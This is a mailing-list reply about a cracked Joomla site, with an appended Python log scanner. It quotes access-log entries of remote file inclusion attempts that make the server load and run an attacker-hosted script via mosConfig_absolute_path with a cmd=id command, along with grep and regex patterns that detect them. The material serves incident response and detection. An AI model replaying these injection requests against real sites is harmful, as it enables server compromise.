alandd@consultpros.com wrote:
> I have been alerted to the fact that the PLUG site is down. Cracked is
> more likely. There has been a rash of security problems with Joomla!
> addins. I thought I patched the calendar but maybe the early fix was not
> good enough.
>
> I have recent backups so I'll have it back as soon as I can. The current
> calendar component will be going away, however. I'll install a new one.
>
> Alan
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>

If you're not on version 1.0.10, upgrade now:
http://www.joomla.org/content/view/1510/74/

I wouldn't be surprised if they make major changes in Joomla to stomp out this type of thing. In all cases where I've had an issue, the database was unaffected, only the files. After the initial panic that I might have been rooted, I was relieved when I found out how they whacked the index.php and configuration.php files on a few of my inactive sites.

After you restore the site, remove com_extcalendar and com_galeria if they're still installed. Check the directory structure to make sure they're gone. Also check your temp directory for strangeness, like a '.a' directory.

If you check your logs you'll find stuff like this:

XXXXX.org/statistics/logs/access_log:64.38.12.106 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.podgorz.cc/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0"

XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:57:34 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

I regularly check to see what they're trying to circumvent now by grepping for this type of vulnerability in the Apache access logs:

/bin/grep mosConfig_absolute_path=http /home/httpd/vhosts/*/statistics/logs/access_log | mail -s 'hack attempts' jd@twingeckos.com

The location of your Apache logs may be different. If you don't have root you can download the logs for your domain and grep them locally.

JD

-- 
JD Austin
Twin Geckos Technology Services LLC
email: jd@twingeckos.com
http://www.twingeckos.com
phone/fax: 480.288.8195
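
Added example, not part of the original message: a log scan in the spirit of the grep above that also catches percent-encoded values (which a literal grep for "mosConfig_absolute_path=http" misses) and separates requests the server answered with 2xx from those it did not serve. The function name scan, the Apache common/combined log layout, and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache common/combined log line; grep's "file:" prefix may precede the IP.
LOG_RE = re.compile(
    r'(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
REMOTE_RE = re.compile(r'\s*(?:https?|ftp)://', re.I)

def scan(lines, param="mosConfig_absolute_path"):
    """Return a finding for each request that sets `param` to a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double encoding.
            decoded = unquote(value)
            if name == param and REMOTE_RE.match(decoded):
                findings.append({
                    "ip": m["ip"], "time": m["ts"], "path": path,
                    "value": decoded,
                    # 2xx: the targeted script exists and answered the request.
                    "answered": m["status"].startswith("2"),
                })
    return findings

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE = [
    'site-a.example/logs/access_log:192.0.2.10 - - [18/Jul/2006:15:25:24 -0700] '
    '"GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path='
    'http://files.example.invalid/a.txt? HTTP/1.0" 200 17757 "-" "Mozilla/5.0"',
    'site-b.example/logs/access_log:198.51.100.7 - - [18/Jul/2006:09:47:29 -0700] '
    '"GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path='
    'http%3A%2F%2Ffiles.example.invalid%2Fa.txt%3F&cmd=id HTTP/1.0" 404 958 "-" "-"',
    'site-b.example/logs/access_log:203.0.113.5 - - [18/Jul/2006:10:01:02 -0700] '
    '"GET /index.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 200 512 "-" "-"',
    'site-b.example/logs/access_log:203.0.113.5 - - [18/Jul/2006:10:02:11 -0700] '
    '"GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 4310 "-" "-"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        note = "answered 2xx, review this site first" if f["answered"] else "not served"
        print(f'{f["time"]} {f["ip"]} {f["path"]} -> {f["value"]} ({note})')
```

Sites whose findings show a 2xx status are the ones to check first for modified index.php and configuration.php files.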